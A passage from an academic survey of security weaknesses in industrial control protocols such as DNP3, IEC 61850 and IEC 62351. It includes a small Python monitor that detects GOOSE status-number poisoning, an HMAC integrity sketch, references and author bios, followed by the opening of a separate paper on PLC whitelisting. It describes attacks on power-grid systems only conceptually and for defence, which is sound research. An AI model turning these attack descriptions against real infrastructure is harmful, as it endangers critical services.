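# stNum behaviour (regressions and implausibly large forward jumps).

MAX_FORWARD_JUMP = 1000   # assumed tolerance for missed messages

class GooseMonitor:
    def __init__(self):
        self.state = {}   # (publisher, control block id) -> last accepted stNum

    def check(self, publisher, goid, st_num):
        key = (publisher, goid)
        last = self.state.get(key)
        if last is None:
            self.state[key] = st_num
            return "learned"
        if st_num < last:
            # regression: a legitimate restart/rollover or a replayed message
            return "alarm: stNum regression"
        if st_num - last > MAX_FORWARD_JUMP:
            # implausible jump: matches the 'high status number' poisoning pattern
            return "alarm: implausible stNum jump"
        self.state[key] = st_num
        return "ok"

mon = GooseMonitor()
print(mon.check("IED_A", "GoCB1", 41))      # learned
print(mon.check("IED_A", "GoCB1", 42))      # ok
print(mon.check("IED_A", "GoCB1", 2**31))   # alarm: implausible jump
print(mon.check("IED_A", "GoCB1", 3))       # alarm: regression
```

Such a check would only raise alarms; deciding whether a flagged event is an attack or an operational artifact still requires the kind of context-aware detection discussed in the recommendations that follow.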
D. Security Recommendations

In the following, first, several general security recommendations are presented; second, enhancements to the IEC 62351 standard going beyond its current state are covered; third, security improvements to CSCPs are discussed.

1) General Protection Measures: As shown in Section V-C, the protocol-specific measures defined by the IEC 62351 security standard are not sufficient against existing threats. Detailed assessments are presented in [62] and [65]. Some attacks are not covered by the standard, or the protection measures are not effective by design. As a result, IEC 62351 is not a panacea for resolving all security challenges at hand. This section provides an overview of general network security means to mitigate the impact of malicious activities.

Reliable network security remains the main requirement and allows preventing unwanted access to and exploration of the network, including the detection of network nodes. Since the idea of security by obscurity is not a workable solution, a proper design and implementation to secure the network perimeter is essential. A secure network perimeter includes fine-grained firewalling and an effective IDS or Intrusion Prevention System (IPS), depending on the network segment. Authentication, sophisticated access control and monitoring should be introduced for all network segments. Apart from the enforced network perimeter, redundant network services should be installed to ensure reliability.

Security measures should be applied not only to CSCPs and control network devices, but also to the switching and routing points. For example, one of the possible techniques to mitigate attacks on switching devices, such as CAM table overflow attacks, is to activate port security. It ensures that no MAC flooding of the switching device is possible, because the MAC address count will be limited by default to one. To relax this restriction for complex industrial networks, which require more flexibility, vendor-specific methods can be applied. Furthermore, the port can be configured to shut down or to block MAC addresses that exceed a specified limit. Moreover, routing and switching security mechanisms allow preventing several types of DoS attacks and attacks on IP networking, such as IP fragmentation.

2) IEC 62351 Improvement Recommendations: The current granularity and detail of the security specifications given in IEC 62351-3 leave room for standard-compliant systems not to uphold the required security. The key factor to remedy this security loophole is the specification of key management inside IEC 62351. Without a clearly defined key management policy, adversaries are able to undermine message confidentiality, integrity, as well as authentication. This in turn leads to further attacks.

Especially in the case of IEC 61850, it is expected that the standard may evolve beyond its current state to include, e.g., feeder and control center communication. Although other protocols covering communications beyond substations exist, the usage of IEC 61850 can improve these applications [10], e.g., by using the same logical nodes, or applying the same messaging techniques such as GOOSE and SV. Mohagheghi et al. state that expanding IEC 61850 to include control centers is technically possible, but likely to achieve questionable performance.
Therefore, solutions which require additional work are to either provide a proxy server for IEC 61850 data in substations, or to map the IEC 61850 data model content to traditional CSCPs, such as DNP3 or IEC 60870-5 [10]. Moreover, the interoperability requirements imposed by IEC 61850-5 in combination with IEC 62351 allow a downgrade attack to be implemented. The underspecification in IEC 62351-3 leaves many security-relevant decisions to the system manufacturers, leading either to incompatibilities, or to choosing the lowest common denominator of security as common ground. As [71] argues, there is a reasonable likelihood that the security flaws do not only exist for the combination of IEC 61850 with IEC 62351, but also in other communication protocols, such as IEC 60870 or DNP3. Also, Fries et al. recommend extending IEC 62351 to overcome the identified weaknesses by introducing security sessions for MMS connections in [65]. This requires changes in IEC 62351-4 for the security of MMS communication, as currently only the MMS-initiated command has the appropriate ASN.1 structures to transport security information. Furthermore, to provide the required integrity protection, the current signature calculation in IEC 62351-4 needs to be revised [65].

3) CSCP Improvement Recommendations: To secure CSCPs based on TCP/IP, an often employed fix is to use TLS. While these protocols offer reliable security, they are themselves not without limitations, especially in the context of ICSs. Foremost, TLS suffers from the fundamental constraint that it can only be used in combination with reliable transport protocols (i.e., TCP), restricting its usage in ICS environments. In addition, it has performance overheads associated with it, cannot provide non-repudiation, and can only ensure channel security, in contrast to object security. Moreover, TLS does not provide protection against traffic analysis or DoS attacks based on connection resets, since the connection handling is done by a lower-level protocol (i.e., TCP) [72]. Therefore, although the usage of TLS offers an easy-to-implement security benefit, future improvements need to focus on finding integral security extensions for CSCPs themselves, as partly demonstrated in, e.g., DNP3 SA.

VI. CONCLUSION

Current control systems are based on ICT devices and their ability to communicate and exchange information with each other by means of a well-defined network. An example of this can be found in the evolution of the traditional power grid to today's smart grid, where energy planning is enabled through data monitoring and the controlling of distributed power generating resources.

Early on, these networks were typically realized using only proprietary solutions. However, the need for remote control and the advances in the area of computer networks (e.g., the Internet) led to the blending of traditional control networks with the modern Internet. In parallel, several network protocols were developed, each targeting specific requirements in order to achieve communication in control systems. On the one hand, the merge of control networks and the Internet contributed to managing control systems without being on site (which was highly required). On the other hand, however, control systems inherited the security vulnerabilities that previously only threatened the modern Internet.
In this paper, we carried out a qualitative security analysis by studying the most broadly employed CSCPs: Modbus (and three of its variants), OPC UA, TASE.2, DNP3 (and two of its variants), IEC 60870-5-101, IEC 60870-5-104, and IEC 61850. To this end, we proposed a uniform methodology to perform the security analysis. First, we composed an adversary model and defined different attack scenarios; consequently, the vulnerable protocols were identified before and after applying the IEC 62351 security standard. In cases where IEC 62351 does not propose any (or no suitable) security solutions, recommendations were presented to protect against these vulnerabilities. It is worthwhile mentioning that in this paper, we focused on protocol vulnerabilities exploitable through network-based attacks.

However, there are also known hardware/software vulnerabilities in networking elements that continue to be exploitable. Here, remote attackers can discover the currently running version of the software and use known exploits to cause DoS or obtain access to a targeted node. Also, threats can emanate not only from the physical medium but from the control system devices themselves and the way networking functions are realized. Thus, powerful adversaries, such as funded organizations and hostile nations, have the ability to convince vendors to implement backdoors into hardware and software such as communication devices, administration and monitoring systems. These are hidden pieces of hardware/software usually used by vendors to provide remote support such as troubleshooting, software updates and patching. These backdoors can, however, also be used to obtain access to sensitive information as well as to cause DoS to critical system elements.

VII. FUTURE RESEARCH PERSPECTIVES

After the careful analysis of the most prominent legacy and current CSCPs, several research orientations requiring further work are identified in this section, organized into different topics.

A. IEC 62351: Challenges and Performance

The security standard IEC 62351 is currently partly unfinished as well as underspecified, as illustrated in Section V-D2. While the issue of underspecification is solvable by updating the standard with more fine-granular specifications for security solutions, challenges especially exist in detecting currently unknown loopholes and interaction effects between different CSCPs in combination with IEC 62351. Finding and effectively solving such shortcomings will be an important future challenge worth investigating.

Apart from the future work required on the security of IEC 62351, it is also important to extensively test its impact on the achieved performance of CSCPs, as applicability is only achievable if Quality of Service (QoS) requirements can be upheld. To be able to guarantee that, extensive experimentation in numerous scenarios and possibly subsequent optimizations are required.

B. Standardization and Validation

Standardization is still a major topic in critical infrastructures overall, and in control systems and protocols in particular. This is mainly because of two reasons: First, standardization is directly connected to interoperability, enabling vendor-agnostic communication between devices.
Second, standardization offers reliable security and a more focused, in-depth security development and analysis. Therefore, the identification of major future standards, as well as their rigorous security analyses, will be important upcoming challenges. While standardization defines the required specifications, it was shown in [73] that, for the use case of the IEC 60870-5-104 protocol, not every device implementing the protocol actually follows the specification. Hence, new rigorous methodologies and tools need to be devised to validate whether devices correctly implement the corresponding standards' specifications.

C. Legacy Protocols: IoT and Further Improvements

The development of security measures for CSCPs makes them more applicable to further areas, such as IoT. For example, the light-weight, open and compatible Modbus can serve as a control means in non-industrial IoT systems. Furthermore, although several security improvements are available for legacy protocols such as Modbus and DNP3, which were discussed in this survey, there is still no solution that fulfills all security requirements:

- Cremers et al. discuss that DNP3 SA still has several security issues. These include, among others, improvable authentication properties for the Update Key Change messages, an unclear specification regarding the usage of Challenge SeQuence numbers (CSQs), and a missing deprecation of HMAC-SHA-1. A full list is given in [35]. These issues need to be addressed in future versions of the DNP3 SA protocol.
- In the case of DNPSec, it is highly recommended to update the protocol to employ recent and secure cryptographic algorithms, as 3-DES and SHA-1 are broken, as previously stated in Section III-A.

D. Performance Improvements for CSCPs

Maintaining acceptable performance of the security means is another issue to be solved during the design and development of secure CSCPs. This paper does not focus on a precise analysis of the limited applicability of security mechanisms to industrial networks with special requirements and constraints. As an example, the performance of DNPSec makes it unsuited for usage in resource-constrained environments [21]. Further research in this direction may reveal how effective and secure protocols can be designed.

Furthermore, the usage of signatures is an important security feature in CSCPs, allowing effective authentication and integrity protection. While RSA is currently often used, finding or optimizing a signature scheme that brings performance to a real-time level is still an open issue. In addition to the optimization of signature schemes, key distribution within ICSs is a challenge that requires further research [74]. Most protocols using symmetric encryption schemes assume a secure channel to pre-establish shared keys and argue that a trusted certificate authority to establish a Public Key Infrastructure (PKI) cannot be safely assumed. While algorithms employing asymmetric schemes offer additional security benefits, they suffer from major performance drawbacks.

Apart from the aforementioned future research topics, only the first step of a security process (as defined in IEC 62351), namely the security assessment, is performed in this article.
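As a brief aside to the symmetric-key discussion in Section VII-D above: once a shared key has been pre-established, per-message integrity protection can be added with a keyed MAC at a fraction of the cost of an RSA signature. The sketch below is purely illustrative; the pre-shared key value, sequence counter, and frame layout are invented for the example and do not correspond to any standardized CSCP extension.

```python
import hmac
import hashlib
import struct

PRESHARED_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # placeholder key

def protect(payload: bytes, seq: int) -> bytes:
    """Append a truncated HMAC-SHA-256 tag over a sequence number and payload.

    The sequence number gives basic replay detection; the 8-byte tag
    truncation and the frame layout are illustrative choices, not a standard.
    """
    header = struct.pack(">I", seq)
    tag = hmac.new(PRESHARED_KEY, header + payload, hashlib.sha256).digest()[:8]
    return header + payload + tag

def verify(frame: bytes, expected_seq: int) -> bytes:
    header, payload, tag = frame[:4], frame[4:-8], frame[-8:]
    (seq,) = struct.unpack(">I", header)
    good = hmac.new(PRESHARED_KEY, header + payload, hashlib.sha256).digest()[:8]
    if seq != expected_seq or not hmac.compare_digest(tag, good):
        raise ValueError("authentication failed or replayed frame")
    return payload

frame = protect(b"\x03\x00\x10\x00\x02", seq=42)   # e.g. a small control PDU
print(verify(frame, expected_seq=42))
```

In contrast to TLS, such a construction protects individual messages (object security) and also works over unreliable transports, but it inherits exactly the key-distribution problem the survey highlights.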
As future work, it would be interesting to analyze the impactof the assessment results on the rest of the process such assecurity policy, deployment, etc. Furthermore, security stan- dards and requirements are likely to change and evolve in the future, so an ongoing contribution in this respect will be toupdate the presented security assessment based on the re ned standards and requirements. A CKNOWLEDGMENT The research leading to these results was supported by the Bavarian Ministry of Economic Affairs and Media, Energy and Technology as part of the East-Bavarian Centre of InternetCompetence project and Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) research grant #ME 1703/12-1, entitled Black-Start. R EFERENCES [1] M. Naedele, Addressing IT security for critical control systems, in Proc. 40th Annu. Hawaii Int. Conf. Syst. Sci. , Waikoloa, HI, USA, Jan. 2007, pp. 115 124. [2] B. Miller and D. Rowe, A survey SCADA of and critical infras- tructure incidents, in Proc. ACM 1st Annu. Conf. Res. Inf. Technol. (RIIT) , Calgary, AB, Canada, 2012, pp. 51 56. [Online]. Available: http://doi.acm.org/10.1145/2380790.2380805 [3] W. Yusheng et al. , Intrusion detection of industrial control system based on Modbus TCP protocol, in Proc. IEEE 13th Int. Symp. Auton. Decentralized Syst. (ISADS) , Bangkok, Thailand, Mar. 2017, pp. 156 162. [4] The Register. (2008). Polish Teen Derails Tram After Hacking Train Network . Accessed: Apr. 18, 2017. [Online]. Available: http://www.theregister.co.uk/2008/01/11/tram_hack/ [5] J. A. Crain and S. Bratus, Bolt-on security extensions for industrial control system protocols: A case study of DNP3 SAv5, IEEE Security Privacy Mag. , vol. 13, no. 3, pp. 74 79, May/Jun. 2015. [6] T. H. Morris and W. Gao, Industrial control system cyber attacks, in Proc. 1st Int. Symp. ICS SCADA Cyber Security Res. (ICS-CSR) , 2013, pp. 22 29. [Online]. Available: http://dl.acm.org/ citation.cfm?id=2735338.2735341 [7] I. N. Fovino, A. Coletta, A. Carcano, and M. Masera, Critical state- based ltering system for securing SCADA network protocols, IEEE Trans. Ind. Electron. , vol. 59, no. 10, pp. 3943 3950, Oct. 2012. [8] B. Babu, T. Ijyas, P. Muneer, and J. Varghese, Security issues in SCADA based industrial control systems, in Proc. 2nd Int. Conf. Anti Cyber Crimes , Abha, Saudi Arabia, Mar. 2017, pp. 47 51. [9] D. Dzung, M. Naedele, T. P. V . Hoff, and M. Crevatin, Security for industrial communication systems, Proc. IEEE , vol. 93, no. 6, pp. 1152 1177, Jun. 2005. [10] S. Mohagheghi, J. Stoupis, and Z. Wang, Communication protocols and networks for power systems-current status and future trends, in Proc. IEEE/PES Power Syst. Conf. Exposit. , Seattle, WA, USA, Mar. 2009, pp. 1 9. [11] R. E. Johnson, Survey of SCADA security challenges and potential attack vectors, in Proc. Int. Conf. Internet Technol. Secured Trans. , London, U.K., Nov. 2010, pp. 1 5. [12] F. Alsiherov and T. Kim, Research trend on secure SCADA network technology and methods, WSEAS Trans. Syst. Control , vol. 5, no. 8, pp. 635 645, Aug. 2010. [13] M. Robinson, The SCADA threat landscape, in Proc. 1st Int. Symp. ICS SCADA Cyber Security Res. (BCS) , London, U.K., 2013, pp. 30 41. [14] T. Bartman and K. Carson, Securing communications for SCADA and critical industrial systems, in Proc. 69th Annu. Conf. Protect. Relay Eng., College Station, TX, USA, Apr. 2016, pp. 1 10. [15] J. T. Michalski, A. Lanzone, J. Trent, S. Smith, and J. Michalski, Secure ICCP integration considerations and recommendations, SandiaNat. 
Lab., Albuquerque, NM, USA, Rep. SAND2007-3345, 2007. [16] M. H. Schwarz and J. Bo rcs k, A survey on OPC and OPC-UA: About the standard, developments and investigations, in Proc. XXIV Int. Conf. Inf. Commun. Autom. Technol. , Oct. 2013, pp. 1 6.[17] M. Kroto l and D. Gollmann, Industrial control systems security: What is happening? in Proc. 11th IEEE Int. Conf. Ind. Informat. , Bochum, Germany, Jul. 2013, pp. 670 675. [18] Z. Drias, A. Serhrouchni, and O. V ogel, Analysis of cyber secu- rity for industrial control systems, in Proc. Int. Conf. Cyber Security Smart Cities Ind. Control Syst. Commun. , Shanghai, China, Aug. 2015, pp. 1 8. [19] M. Mallouhi, Y . Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, A testbed for analyzing security of SCADA control systems (TASSCS), inProc. Innov. Smart Grid Technol. , Anaheim, CA, USA, Jan. 2011, pp. 1 7. [20] S. East, J. Butts, M. Papa, and S. Shenoi, A Taxonomy of Attacks on the DNP3 Protocol . Heidelberg, Germany: Springer, 2009, pp. 67 81. [Online]. Available: https://doi.org/10.1007/978-3-642-04798-5_5 [21] D. Lee, H. Kim, K. Kim, and P. D. Yoo, Simulated attack on DNP3 protocol in SCADA system, in Proc. 31th Symp. Cryptography Inf. Security , 2014, pp. 1 6. [22] D. S. Pidikiti, R. Kalluri, R. K. S. Kumar, and B. S. Bindhumadhava, SCADA communication protocols: Vulnerabilities, attacks and possible mitigations, CSI Trans. ICT , vol. 1, no. 2, pp. 135 141, Jun. 2013. [Online]. Available: https://doi.org/10.1007/s40012-013-0013-5 [23] P. Matou sek, Description and analysis of IEC 104 protocol, Faculty Inf. Technol., Brno Univ. Technol., Brno, Czech Republic, Rep. FIT-TR-2017-12, 2017. [24] J. L. Rrushi, SCADA Protocol Vulnerabilities . Heidelberg, Germany: Springer, 2012, pp. 150 176. [Online]. Available: https://doi.org/ 10.1007/978-3-642-28920-0_8 [25] J. Jarmakiewicz, K. Ma slanka, and K. Parobczak, Development of cyber security testbed for critical infrastructure, in Proc. Int. Conf. Military Commun. Inf. Syst. , Krak w, Poland, May 2015, pp. 1 10. [26] P. Maynard, K. McLaughlin, and B. Haberler, Towards understanding man-in-the-middle attacks on IEC 60870-5-104 SCADA networks, in Proc. 2nd Int. Symp. ICS SCADA Cyber Security Res. (BCS) , 2014, pp. 30 42. [27] Y . Yang et al. , Man-in-the-middle attack test-bed investigating cyber- security vulnerabilities in smart grid SCADA systems, in Proc. Int. Conf. Sustain. Power Gener. Supply (IET) , Hangzhou, China, 2012, pp. 1 8. [28] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, Design and implementation of a secure Modbus protocol, in Critical Infrastructure Protection III , C. Palmer and S. Shenoi, Eds. Heidelberg, Germany: Springer, 2009, pp. 83 96. [29] A. Shahzad et al. , Real time MODBUS transmissions and cryptography security designs and enhancements of protocol sensitive information, Symmetry , vol. 7, no. 3, pp. 1176 1210, 2015. [Online]. Available: http://www.mdpi.com/2073-8994/7/3/1176 [30] E. d mk , G. Jakab czki, and P. T. Szemes, Proposal of a secure Modbus RTU communication with Adi Shamir s secret sharing method, Int. J. Electron. Telecommun. , vol. 64, no. 2, pp. 107 114, 2018. [31] R. Huang, F. Liu, and P. Dongbo, Research on OPC UA security, in Proc. 5th IEEE Conf. Ind. Electron. Appl. , Taichung, Taiwan, Jun. 2010, pp. 1439 1444. [32] M. Majdalawieh, F. Parisi-Presicce, and D. Wijesekera, DNPSec: Distributed network protocol version 3 (DNP3) security framework, inAdvances in Computer, Information, and Systems Sciences, and Engineering , K. Elleithy, T. Sobh, A. Mahmood, M. 
Iskander, and M. Karim, Eds. Dordrecht, The Netherlands: Springer, 2006,pp. 227 234. [33] N. Rodo le, K. Radke, and E. Foo, Real-time and interactive attacks on DNP3 critical infrastructure using scapy, in Proc. 13th Aust. Inf. Security Conf. , Sydney, NSW, Australia, 2015, pp. 67 70. [34] C. Singh, A. Nivangune, and M. Patwardhan, Function code based vulnerability analysis of DNP3, in Proc. IEEE Int. Conf. Adv. Netw. Telecommun. Syst. , Bengaluru, India, 2016, pp. 1 6. [35] C. Cremers, M. Dehnel-Wild, and K. Milner, Secure authentication in the grid: A formal analysis of DNP3: SAv5, in Proc. Eur. Symp. Res. Comput. Security , 2017, pp. 389 407. [36] G. Gilchrist, Secure authentication for DNP3, in Proc. IEEE 21st Century Power Energy Soc. Gen. Meeting Convers. Del. Elect. Energy , Pittsburgh, PA, USA, Jul. 2008, pp. 1 3. [37] R. Amoah, Formal security analysis of the DNP3-secure authentication protocol, Ph.D. dissertation, School Elect. Eng. Comput. Sci., Sci. Eng.Faculty, Queensland Univ. Technol., Brisbane, QLD, Australia, 2010. [38] R. Amoah, S. Camtepe, and E. Foo, Securing DNP3 broadcast com- munications in SCADA systems, IEEE Trans. Ind. Informat. , vol. 12, no. 4, pp. 1474 1485, Aug. 2016. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:20 UTC from IEEE Xplore. Restrictions apply. VOLKOV A et al. : SECURITY CHALLENGES IN CONTROL NETWORK PROTOCOLS: SURVEY 639 [39] J. Hong, C.-C. Liu, and M. Govindarasu, Detection of cyber intrusions using network-based multicast messages for substation automation, inProc. Innov. Smart Grid Technol. , Washington, DC, USA, Feb. 2014, pp. 1 5. [40] M. T. A. Rashid, S. Yussof, Y . Yusoff, and R. Ismail, A review of security attacks on IEC61850 substation automation system network, inProc. 6th Int. Conf. Inf. Technol. Multimedia , Putrajaya, Malaysia, Nov. 2014, pp. 5 10. [41] B. Kang et al. , Investigating cyber-physical attacks against IEC 61850 photovoltaic inverter installations, in Proc. IEEE 20th Conf. Emerg. Technol. Factory Autom. (ETFA) , Sep. 2015, pp. 1 8. [42] I. A. Siddavatam and F. Kazi, Security assessment framework for cyber physical systems: A case-study of DNP3 protocol, in Proc. IEEE Bombay Section Symp. (IBSS) , Sep. 2015, pp. 1 6. [43] N. Kush, M. Branagan, E. Foo, and E. Ahmed, Poisoned GOOSE: Exploiting the GOOSE protocol, in Proc. Aust. Inf. Security Conf. , Jan. 2014, pp. 17 22. [Online]. Available: https://eprints.qut.edu.au/66227/ [44] J. Hoyos, M. Dehus, and T. X. Brown, Exploiting the GOOSE protocol: A practical attack on cyber-infrastructure, in Proc. IEEE Globecom Workshops , Anaheim, CA, USA, Dec. 2012, pp. 1508 1513. [45] A. Shahzad, S. Musa, A. Aborujilah, and M. Irfan, The SCADA review: System components, architecture, protocols and future security trends, Amer. J. Appl. Sci. , vol. 11, pp. 1418 1425, Aug. 2014. [46] D. Kang and R. J. Robles, Compartmentalization of protocols in SCADA communication, Int. J. Adv. Sci. Technol. , vol. 8, pp. 27 36, Jul. 2009. [47] Communication network dependencies for ICS/SCADA systems, Eur. Union Agency Netw. Inf. Security, Heraklion, Greece, Rep. TP-06-16- 344-EN-N, 2017. [48] IEEE Standard for Electric Power Systems Communications-Distributed Network Protocol (DNP3) , IEEE Standard 1815-2012, 2012. [49] T. Radu and S. Mircea, Evaluation of DES, 3 DES and AES on win- dows and unix platforms, in Proc. Int. Joint Conf. Comput. Cybern. Tech. Informat. ,T i m i soara, Romania, May 2010, pp. 119 123. [50] M. 
Stevens, New collision attacks on SHA-1 based on optimal joint local-collision analysis, in Advances in Cryptology EUROCRYPT 2013 , T. Johansson and P. Q. Nguyen, Eds. Heidelberg, Germany: Springer, 2013, pp. 245 261. [51] M. Abrams and J. Weiss, Malicious control system cyber security attack case study Maroochy water services, Appl. Control Solut., MITRECorporat., McLean, V A, USA, Rep. 08-1145, 2008. [52] A. Saxena, O. Pal, and Z. Saquib, Public Key Cryptography Based Approach for Securing SCADA Communications . Heidelberg, Germany: Springer, 2011, pp. 56 62, doi: 10.1007/978-3-642-19542-6_10 . [53] L. Pi tre-Cambac d s and P. Sitbon, Cryptographic key management for SCADA systems-issues and perspectives, in Proc. Int. Conf. Inf. Security Assurance (ISA) , Apr. 2008, pp. 156 161. [54] C. W. Ten, G. Manimaran, and C. C. Liu, Cybersecurity for critical infrastructures: Attack and defense modeling, IEEE Trans. Syst., Man, Cybern. A, Syst., Humans , vol. 40, no. 4, pp. 853 865, Jul. 2010. [55] A. A. Cardenas, T. Roosta, and S. Sastry, Rethinking security prop- erties, threat models, and the design space in sensor networks: A case study in SCADA systems, Ad Hoc Netw. , vol. 7, no. 8, pp. 1434 1447, Nov. 2009, doi: 10.1016/j.adhoc.2009.04.012 . [56] IEC SC 65A, Functional Safety of Electrical/Electronic/Programmable Electronic Safety-related Systems , IEC Standard 61508, 2010. [57] J. Cai, Y . Zheng, and Z. Zhou, Review of cyber-security challenges and measures in smart substation, in Proc. Int. Conf. Smart Grid Clean Energy Technol. , Chengdu, China, Oct. 2016, pp. 65 69. [58] (2010). STI Graduate Student Research, as part of the Information Security Reading Room . [Online]. Available: https://www.sans.org/ reading-room/whitepapers/intrusion/paper/33513 [59] U. K. Premaratne, J. Samarabandu, T. Sidhu, R. Beresh, and J. C. Tan, An intrusion detection system for IEC61850 automated substations, IEEE Trans. Power Del. , vol. 25, no. 4, pp. 2376 2383, Oct. 2010. [60] U. K. Premaratne, J. Samarabandu, T. Sidhu, R. Beresh, and J. C. Tan, Security analysis and auditing of IEC61850-based automated sub-stations, IEEE Trans. Power Del. , vol. 25, no. 4, pp. 2346 2355, Oct. 2010. [61] A. Nagarajan and C. D. Jensen, A generic role based access control model for wind power systems, J. Wireless Mobile Netw. Ubiquitous Comput. Depend. Appl. , vol. 1, no. 4, pp. 35 49, 2010. [62] R. Schlegel, S. Obermeier, and J. Schneider, Assessing the security of IEC 62351, in Proc. 3rd Int. Symp. ICS SCADA Cyber Security Res. , Ingolstadt, Germany, 2015, pp. 11 19.[63] F. Hohlbaum, M. Braendle, and F. Alvarez, Cyber security practical considerations for implementing IEC 62351, in Proc. Protect. Autom. Control World Conf. , 2010. [64] M. Strobel, N. Wiedermann, and C. Eckert, Novel weaknesses in IEC 62351 protected smart grid control systems, in Proc. IEEE Int. Conf. Smart Grid Commun. (SmartGridComm) , Nov. 2016, pp. 266 270. [65] S. Fries, H. J. Hof, and M. Seewald, Enhancing IEC 62351 to improve security for energy automation in smart grid environments, in Proc. IEEE 5th Int. Conf. Internet Web Appl. Services , 2010, pp. 135 142. [66] E. D. Knapp and J. T. Langill, Industrial Network Security: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems . Waltham, MA, USA: Elsevier Sci., 2014. [67] D. Moore, C. Shannon, D. J. Brown, G. M. V oelker, and S. Savage, Inferring Internet denial-of-service activity, ACM Trans. Comput. Syst. , vol. 24, no. 2, pp. 115 139, 2006. [68] G. 
D n, H. Sandberg, M. Ekstedt, and G. Bj rkman, Challenges in power system information security, IEEE Security Privacy , vol. 10, no. 4, pp. 62 70, Jul./Aug. 2012. [69] K. Choi et al. , Intrusion detection of NSM based DoS attacks using data mining in smart grid, Energies , vol. 5, no. 10, pp. 4091 4109, 2012. [Online]. Available: http://www.mdpi.com/1996-1073/5/10/4091 [70] F. Cleveland, IEC 62351 security standards for the power system information infrastructure, IEC, Geneva, Switzerland, Rep. IEC TC57 WG15, 2012. [71] J. G. Wright and S. D. Wolthusen, Limitations of IEC 62351-3 s public key management, in Proc. IEEE 24th Int. Conf. Netw. Protocols (ICNP) , Singapore, Nov. 2016, pp. 1 6. [72] J. H. Graham and S. C. Patel, Security considerations in SCADA communication protocols, Intell. Syst. Res. Lab., Dept. Comput. Eng.Comput. Sci., Univ. Louisville, Louisville, KY , USA, Rep. TR-ISRL- 04-01, 2004. [73] M. Kerkers, J. Chromik, A. Remke, and B. Haverkort, A tool for ger- erating automata of IEC60870-5-104 implementations, in Proc. 19th Int. GI/ITG Conf. Meas. Model. Eval. Comput. Syst. , 2018, pp. 1 5. [74] C. L. Beaver, D. R. Gallup, W. D. Neumann, and M. D. Torgerson, Key management for SCADA, Sandia Nat. Lab., Albuquerque, NM, USA,Rep. SAND2001-3252, 2002. Anna Volkova received the Diploma degree in information systems security from Peter the Great St. Petersburg Polytechnic University and the Masterof Computer Science degree in information security from the University of Passau. She contributed over 5 network security, software-de ned networking security, and smart grid security research projects in the last three years. Michael Niedermeier has been a Research Associate with the Chair of Computer Networks and Computer Communications and with the Institute of IT Security and Security Law, University of Passau since 2009. His mainresearch areas focus on novel dependability enhancements, security, and func-tional safety in distributed systems such as the smart grid. He scienti cally contributed to EU EFRE SECBIT, EU FP7 SEC-2013.2.5-4 HyRiM, and the East-Bavarian Centre of Internet Competence supported by Bavarian Ministryof Economic Affairs and Media, and Energy and Technology. He was anActive Member of both the EURO-NF and EINS networks of excellence. Robert Basmadjian received the Ph.D. degree in data replication from the University of Toulouse. In 2009, he joined the University of Passau as aPost-Doctoral Fellow. He was a Scienti c and Technical Contributor to EU FP7 FIT4Green and ALL4Green projects related to Demand Response in data centers as well as to H2020 Electri c project. His main research interestsare large-scale energy management systems (smart grid), and performancemodeling of computing systems (queuing theory). He has over 25 scienti c publications in the above areas. He was an Active Member of WG 2 and 3 of COST ACTION 804, EURO-NF, and EINS. Hermann de Meer received the Ph.D. degree from the University Erlangen-Nuremberg, Germany, in 1992 and the Habilitation degree from Hamburg University, Germany. He has been appointed as a Full Professorof computer science with the University of Passau, Germany, since 2003.He is heading the Computer Networking Lab and co-heading the Institute of IT Security and Security Law. His interests of research include network virtualization, digitization of energy systems, IT security of critical infras-tructures, and distributed control and optimization. 
He is a member of the ACM and of the Gesellschaft für Informatik, and a fellow of the Deutsche Forschungsgemeinschaft.
On_Experimental_validation_of_Whitelist_Auto-Generation_Method_for_Secured_Programmable_Logic_Controllers.pdf
This paper considers a whitelisting system for programmable logic controllers (PLCs). In control systems, controllers are the final fortress that keeps field devices (actuators/sensors) operating, yet they are fragile with respect to malware and zero-day attacks. One countermeasure applicable to controllers is a whitelisting system, which registers normal controller behavior in a whitelist and detects abnormal operations against that list. Previous research by the current authors proposed a PLC whitelisting system implemented via a ladder diagram (LD). LD representations have wide applicability because LDs, and therefore the security functions, can be implemented on virtually all PLCs without hardware/firmware updates. However, the current approach requires that all instances be entered in the whitelist manually. In this paper, we show how the setup of the whitelist can be automated from the PLC behavior. We introduce an auto-generation approach for the whitelist using the sequential function chart (SFC) instead of the LD; SFC and LD are compatible representations for the PLC. Using Petri Net modeling, this paper proposes how to generate the whitelist from the SFC and how to detect abnormal operations via the whitelist. We call the SFC-based approach the model-based whitelist and the Petri Net based approach the model-based detection. Further, this paper carries out an experimental validation of the algorithms using an OpenPLC based testbed system.
On Experimental validation of Whitelist Auto- Generation Method for Secured Programmable Logic Controllers Shintaro Fujita Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Kenji Sawada Info-Powerd Energy System Research Center University of Electro-Communications Tokyo, Japan [email protected] Kosuke Hata Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Seiichi Shin Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Akinori Mochizuki Dept. of Mechanical Engineering and Intelligent Systems University of Electro-Communications Tokyo, Japan [email protected] Shu Hosokawa Control System Security Center Miyagi, Japan [email protected] Keywords PLC, Security, Whitelist, Petri Net I. INTRODUCTION Control systems face a lot of cyber-attacks [1], such Stuxnet, Wannacry, Crashoverride, Badrabbit [2][3][4]. The typical control system consists of SCADA (Supervisory Control And Data Acquisition), network switches, controllers and field devices. Initially, it is supposed that malicious attackers target SCADA and penetrate its vulnerabilities because software update causing the system restart is avoided for the control system availability and Windows OS version of SCADA often remains old. Furthermore, recent malware directly targets controllers (PLC blaster and Modbus stager) [5][6]. Controller is a final fortress of control systems. Even if SCADAs stop suddenly, controllers themselves continues the operation of field devise. If controllers stop, control systems cannot be operated by SCADAs. Therefore, we need countermeasures focusing on controllers [7]. The main functions of the controller are operating field devices and communicating with other devices. System resources for the security function are not high, then it is not easy to apply anti-virus software to controllers directly. The typical anti-virus software is based on the blacklisting system in which abnormal behaviors caused by malwares/worms are listed and behaviors of application commands are always checked. This system load of blacklist checking is very high for controllers. Further, the blacklisting system requires frequent updates of pattern files to maintain its defensive strength. Therefore, it is supposed that the whitelisting system is familiar with control systems rather than the blacklisting system [8][9]. The whitelisting 